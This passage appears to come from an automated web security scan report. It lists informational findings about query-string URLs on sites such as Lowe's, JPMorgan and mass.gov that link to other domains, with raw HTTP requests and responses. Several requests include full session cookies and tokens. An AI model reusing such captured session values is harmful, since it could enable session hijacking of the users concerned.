<img src="http://r.turn.com/r/beacon?b2=XQJXoc3GXJl4C2OPaUWM7iAtM36VAFfKNtiRjH8FDumizyRr3ZDS0kVs9n6J_dLRq_NW3YM2poGhXMGhfdiF5g&cid=&bprice=&rnd=1310503191" alt="" border="0" width="1" height="1">
<img src="http://bstats.adbrite.com/click/bstats.gif?kid=47018554&bapid=9470" alt="" border="0" width="1" height="1">
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=25222;sz=1x1;ord=1310503191?" alt="" border="0" width="1" height="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1310503191" alt="" border="0" width="1" height="1">
<img src="http://pixel.mathtag.com/data/img?mt_id=100036&mt_dcid=1310503191" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

16.19. http://www.interactivemediaawards.com/winners/certificate.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivemediaawards.com
Path:	/winners/certificate.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.interactivemediaawards.com/winners/certificate.asp?param=83754&cat=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/validator?uri=http://www.interactivemediaawards.com/styles/styles.css
http://twitter.com/imadotcom
http://validator.w3.org/check/referer
http://www.facebook.com/pages/IMA/141598708447
http://www.ri.gov/
https://ssl.google-analytics.com/urchin.js

Request

GET /winners/certificate.asp?param=83754&cat=1 HTTP/1.1
Host: www.interactivemediaawards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25031
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:36:23 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/maintemplate.dwt.asp" codeOutsideHTMLIsLocked=
...[SNIP]...
<td><a href="http://www.facebook.com/pages/IMA/141598708447" target="_blank"><img src="/images/icon_facebook.png" width="32" height="32" border="0">
...[SNIP]...
<td><a href="http://twitter.com/imadotcom" target="_blank"><img src="/images/icon_twitter.png" width="32" height="32" border="0">
...[SNIP]...
<p align="center" class="tiny"><a href="http://www.ri.gov" target="_blank"><img src="/images/visitsite.gif" width="135" height="22" border="0">
...[SNIP]...
</a> | This page validates: <a href="http://validator.w3.org/check/referer" target="_blank">HTML 4.01</a> | <a href="http://jigsaw.w3.org/css-validator/validator?uri=http://www.interactivemediaawards.com/styles/styles.css" target="_blank">CSS2</a></p>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.20. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/investbk/solutions/fixedincome/fx

Issue detail

The page was loaded from a URL containing a query string:

http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu

The response contains the following links to other domains:

http://investor.shareholder.com/jpmorganchase/index.cfm
http://www.chase.com/
http://www.jpmorganchase.com/

Request

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:21 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...
<li>

       <a href='http://investor.shareholder.com/jpmorganchase/index.cfm' title='Investor Relations' target="_top"><span>
...[SNIP]...
</a>  /
       <a href='http://www.jpmorganchase.com' title='JPMorgan Chase' target="_top"><span>
...[SNIP]...
</a>  /
       <a href='http://www.chase.com' title='Chase' target="_top"><span>
...[SNIP]...

16.21. http://www.lowes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0

The response contains the following links to other domains:

http://investor.shareholder.com/lowes
http://lowes.baliblinds.com/index.jsp?UserSearch=bali&langId=-1&storeId=10151&catalogId=10051&N=0&cm_sp=HomeFashions-_-Home|A4a-_-Pct_Off|15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_10_HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop
http://lowes.baliblinds.com/index.jsp?UserSearch=bali&langId=-1&storeId=10151&catalogId=10051&N=0&cm_sp=HomeFashions-_-Home|A4a-_-Pct_Off|15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_9_HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop
http://lowes.shoplocal.com/lowes/
http://twitter.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_TWITTER
http://www.facebook.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_FACEBOOK
http://www.gmfleet.com/businessChoice/gmfleet/index.jsp?cmp=Lowes_Referral
http://www.kobalttools.com/
http://www.lowes.ca/
http://www.lowescreativeideas.com/Home.aspx
http://www.lowesforpros.com/
http://www.lowesracing.com/
http://www.youtube.com/v/RLRML9gFQ3E?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Garage_Storage_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_19_HomeOrganization-Home-A6b-Merch-Garage_Storage_Video
http://www.youtube.com/v/RLRML9gFQ3E?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Garage_Storage_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_21_HomeOrganization-Home-A6b-Merch-Garage_Storage_Video
http://www.youtube.com/v/S_jY8PsDkIY?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Install_Closet_Wire_Shelves_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_23_HomeOrganization-Home-A6b-Merch-Install_Closet_Wire_Shelves_Video
http://www.youtube.com/v/l8Q0OTX8zIQ?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Install_Cabinet_Organizers_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_22_HomeOrganization-Home-A6b-Merch-Install_Cabinet_Organizers_Video
https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129

Request

GET /?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0 HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmSessionDepth=1; cmTPSet=Y; lowes-prefs={"zipin":{"show":false}}; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; stop_mobi=yes; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Language: en-US
Content-Length: 85257
Expires: Tue, 12 Jul 2011 21:30:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- BEGIN TopCate
...[SNIP]...
<li class="category"><a class="category_name" target="_blank" name="MASTHEAD_2_lowes_creative_ideas" href="http://www.lowescreativeideas.com/Home.aspx" rel="/MContent/Structured/MastheadArea/home_ideas/lci.html">Lowe's Creative Ideas</a>
...[SNIP]...
<li class="main-level first"><a target="_blank" name="MASTHEAD_2_weekly_ads" class="weekly-ad" href="http://lowes.shoplocal.com/lowes/">Weekly Ads</a>
...[SNIP]...
<li class="main-level"><a target="_blank" name="MASTHEAD_2_for_your_business" href="http://www.lowesforpros.com/">For Your Business</a>
...[SNIP]...
<li> <a name="HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop" title="Shop Blinds and Shades" class="link-new-window" href="http://lowes.baliblinds.com/index.jsp?UserSearch=bali&langId=-1&storeId=10151&catalogId=10051&N=0&cm_sp=HomeFashions-_-Home|A4a-_-Pct_Off|15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_9_HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop"> <img src="/campaign/summer/2011/images/homepage/20110712_area4_Bali.png" alt="15% Off Special Order Bail Blinds and Shades" />
...[SNIP]...
</p> <a name="HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop" title="Shop Blinds and Shades" class="link-new-window learn-more" href="http://lowes.baliblinds.com/index.jsp?UserSearch=bali&langId=-1&storeId=10151&catalogId=10051&N=0&cm_sp=HomeFashions-_-Home|A4a-_-Pct_Off|15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_10_HomeFashions-Home-A4a-Pct_Off-15_Off_SOS_Bali_Blinds_Shades_Plus_Upgrades_Shop">Shop Blinds and Shades</a>
...[SNIP]...
<div id="npc_image">    <a name="HomeOrganization-Home-A6b-Merch-Garage_Storage_Video" class="video" title="Watch the Video" href="http://www.youtube.com/v/RLRML9gFQ3E?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Garage_Storage_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_19_HomeOrganization-Home-A6b-Merch-Garage_Storage_Video">                    <img src="/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png" alt="Get It Together" />
...[SNIP]...
<br/><a name="HomeOrganization-Home-A6b-Merch-Garage_Storage_Video" class="video learn-more" title="Watch the Video" href="http://www.youtube.com/v/RLRML9gFQ3E?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Garage_Storage_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_21_HomeOrganization-Home-A6b-Merch-Garage_Storage_Video"><strong>
...[SNIP]...
<li><a name="HomeOrganization-Home-A6b-Merch-Install_Cabinet_Organizers_Video" title="Install Cabinet Organizers" class="learn-more video" href="http://www.youtube.com/v/l8Q0OTX8zIQ?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Install_Cabinet_Organizers_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_22_HomeOrganization-Home-A6b-Merch-Install_Cabinet_Organizers_Video">Install Cabinet Organizers</a>
...[SNIP]...
<li><a name="HomeOrganization-Home-A6b-Merch-Install_Closet_Wire_Shelves_Video" title="Install Wire Shelves" class="learn-more video" href="http://www.youtube.com/v/S_jY8PsDkIY?cm_sp=HomeOrganization-_-Home|A6b-_-Merch|Install_Closet_Wire_Shelves_Video&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A4+Activity+7.12.11-_-HomePage_Area4-_-10604_23_HomeOrganization-Home-A6b-Merch-Install_Closet_Wire_Shelves_Video">Install Wire Shelves</a>
...[SNIP]...
<li><a name="FOOTER_2_GM_Choice" title="GM Business Choice" href="http://www.gmfleet.com/businessChoice/gmfleet/index.jsp?cmp=Lowes_Referral" target="_blank">GM Business Choice</a>
...[SNIP]...
<li><a name="FOOTER_2_Kobalt_Tools" target="_blank" href="http://www.kobalttools.com">Kobalt Tools</a>
...[SNIP]...
<li><a name="FOOTER_2_LCI" target="_blank" href="http://www.lowescreativeideas.com/Home.aspx">Lowe's Creative Ideas</a>
...[SNIP]...
<li><a name="FOOTER_2_Lowes_Pros" target="_blank" href="http://www.lowesforpros.com">LowesForPros</a>
...[SNIP]...
<li><a name="FOOTER_2_Lowes_Racing" target="_blank" href="http://www.lowesracing.com">Team Lowe's Racing</a>
...[SNIP]...
<li><a name="FOOTER_2_Investor_Relations" href="http://investor.shareholder.com/lowes">Investor Relations</a>
...[SNIP]...
<li><a name="FOOTER_2_Canada" class="canada" href="http://www.lowes.ca">Lowe's Canada</a>
...[SNIP]...
<h5>Connect With Us:                <a name="FOOTER_2_Facebook" class="facebook" target="_blank" href="http://www.facebook.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_FACEBOOK"> </a>                <a name="FOOTER_2_Twitter" class="twitter" target="_blank" href="http://twitter.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_TWITTER"> </a>
...[SNIP]...
<div class="badgeList">            <a title="BBB Accredited Business" id="bbb" class="bbb footer_min" target="_blank" name="FOOTER_2_BBB" href="https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129"></a>
...[SNIP]...

16.22. http://www.lowes.com/pc_Flooring_4294934373_4294937087_ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/pc_Flooring_4294934373_4294937087_

Issue detail

The page was loaded from a URL containing a query string:

http://www.lowes.com/pc_Flooring_4294934373_4294937087_?cm_sp=Flooring-_-Home|A2R2-_-Merch|Flooring_Event_Page_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop

The response contains the following links to other domains:

http://investor.shareholder.com/lowes
http://lowes.shoplocal.com/lowes/
http://twitter.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_TWITTER
http://www.facebook.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_FACEBOOK
http://www.gmfleet.com/businessChoice/gmfleet/index.jsp?cmp=Lowes_Referral
http://www.kobalttools.com/
http://www.lowes.ca/
http://www.lowescreativeideas.com/Home.aspx
http://www.lowesforpros.com/
http://www.lowesracing.com/
https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 101354
Date: Tue, 12 Jul 2011 21:31:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:24 GMT
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:24 GMT
Set-Cookie: catSearchResult=|/pl_Flooring_4294934373_4294937087_; Path=/
Set-Cookie: TSdcd8fd=7907db042a2a9db2b27b1ceb1986c74b691d48a17df081e44e1cbbd2; Path=/
Set-Cookie: TSdcd8fd=11f75cf6ef221eee9be8eb664312c9d98f23ec9430417adf4e1cbbd2; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta charse
...[SNIP]...
<li class="category"><a class="category_name" target="_blank" name="MASTHEAD_2_lowes_creative_ideas" href="http://www.lowescreativeideas.com/Home.aspx" rel="/MContent/Structured/MastheadArea/home_ideas/lci.html">Lowe's Creative Ideas</a>
...[SNIP]...
<li class="main-level first"><a target="_blank" name="MASTHEAD_2_weekly_ads" class="weekly-ad" href="http://lowes.shoplocal.com/lowes/">Weekly Ads</a>
...[SNIP]...
<li class="main-level"><a target="_blank" name="MASTHEAD_2_for_your_business" href="http://www.lowesforpros.com/">For Your Business</a>
...[SNIP]...
<li><a name="FOOTER_2_GM_Choice" title="GM Business Choice" href="http://www.gmfleet.com/businessChoice/gmfleet/index.jsp?cmp=Lowes_Referral" target="_blank">GM Business Choice</a>
...[SNIP]...
<li><a name="FOOTER_2_Kobalt_Tools" target="_blank" href="http://www.kobalttools.com">Kobalt Tools</a>
...[SNIP]...
<li><a name="FOOTER_2_LCI" target="_blank" href="http://www.lowescreativeideas.com/Home.aspx">Lowe's Creative Ideas</a>
...[SNIP]...
<li><a name="FOOTER_2_Lowes_Pros" target="_blank" href="http://www.lowesforpros.com">LowesForPros</a>
...[SNIP]...
<li><a name="FOOTER_2_Lowes_Racing" target="_blank" href="http://www.lowesracing.com">Team Lowe's Racing</a>
...[SNIP]...
<li><a name="FOOTER_2_Investor_Relations" href="http://investor.shareholder.com/lowes">Investor Relations</a>
...[SNIP]...
<li><a name="FOOTER_2_Canada" class="canada" href="http://www.lowes.ca">Lowe's Canada</a>
...[SNIP]...
<h5>Connect With Us:
               <a name="FOOTER_2_Facebook" class="facebook" target="_blank" href="http://www.facebook.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_FACEBOOK"> </a>
               <a name="FOOTER_2_Twitter" class="twitter" target="_blank" href="http://twitter.com/lowes?cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A6+Activity+2.3.11-_-HomePage_Area6-_-10605_10_PROMO_5B_TWITTER"> </a>
...[SNIP]...
<div class="badgeList">
           <a title="BBB Accredited Business" id="bbb" class="bbb footer_min" target="_blank" name="FOOTER_2_BBB" href="https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129"></a>
...[SNIP]...

16.23. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page was loaded from a URL containing a query string:

https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D

The response contains the following link to another domain:

https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:35 GMT
Set-Cookie: TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<li><a name="FOOTER_2_BBB" href="https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129" onclick="window.open('https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129'); return false;"><img src="/images/icon-bbb.jpg" alt="" />
...[SNIP]...

16.24. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The page was loaded from a URL containing a query string:

https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D

The response contains the following link to another domain:

https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129

Request

Response

16.25. http://www.mass.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mass.gov
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mass.gov/?pageID=eopsagencylanding&L=3&sid=Eeops&L0=Home&L1=Public+Safety+Agencies&L2=Massachusetts+Emergency+Management+Agency

The response contains the following links to other domains:

http://ceo.hrd.state.ma.us/ceo.nsf/ceo_homepage_frm?openform
http://transportation.blog.state.ma.us/blog/
http://twitter.com/BostonLogan
http://twitter.com/MassDOT
http://twitter.com/massema
http://twitter.com/mbtaGM
http://www.epa.gov/emergencies/content/epcra/tier2.htm
http://www.erh.noaa.gov/box/
http://www.erh.noaa.gov/er/aly/
http://www.facebook.com/pages/Framingham-MA/Massachusetts-Emergency-Management-Agency/190278737330
http://www.massfinance.state.ma.us/
http://www.massport.com/logan-airport/Pages/Default.aspx
http://www.massvoad.org/
http://www.mbta.com/rider_tools/transit_updates/
http://www.memanet.org/eoc7
http://www.ready.gov/
http://www1.eot.state.ma.us/
https://ecemp.chs.state.ma.us/MemaCem/memalogin.aspx
https://training.mema.state.ma.us/Mema/mmFrontPage.do

Request

GET /?pageID=eopsagencylanding&L=3&sid=Eeops&L0=Home&L1=Public+Safety+Agencies&L2=Massachusetts+Emergency+Management+Agency HTTP/1.1
Host: www.mass.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:29 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:44:29 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 41222

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<li><a href="https://training.mema.state.ma.us/Mema/mmFrontPage.do" title="Training Registration System">Training Registration System</a>
...[SNIP]...
<li><a href="http://www.epa.gov/emergencies/content/epcra/tier2.htm" title="EPA Tier II Information">EPA Tier II Information</a>
...[SNIP]...
<li><a href="http://www.massfinance.state.ma.us/" title="Doing Business with the Commonwealth">Doing Business with the Commonwealth</a>
...[SNIP]...
<li><a href="http://www.memanet.org/eoc7" title="WebEOC (Secure Login)">WebEOC (Secure Login)</a>
...[SNIP]...
<li><a href="https://ecemp.chs.state.ma.us/MemaCem/memalogin.aspx" title="eCEMP (Secure Login)">eCEMP (Secure Login)</a>
...[SNIP]...
<li><a href="http://ceo.hrd.state.ma.us/ceo.nsf/ceo_homepage_frm?openform" title="Job Opportunities with MEMA">Job Opportunities with MEMA</a>
...[SNIP]...
<div class="linkimage"><a href="https://training.mema.state.ma.us/Mema/mmFrontPage.do"><img src="/Eeops/images/mema/mema_training.gif" alt="MEMA Training Calendar" />
...[SNIP]...
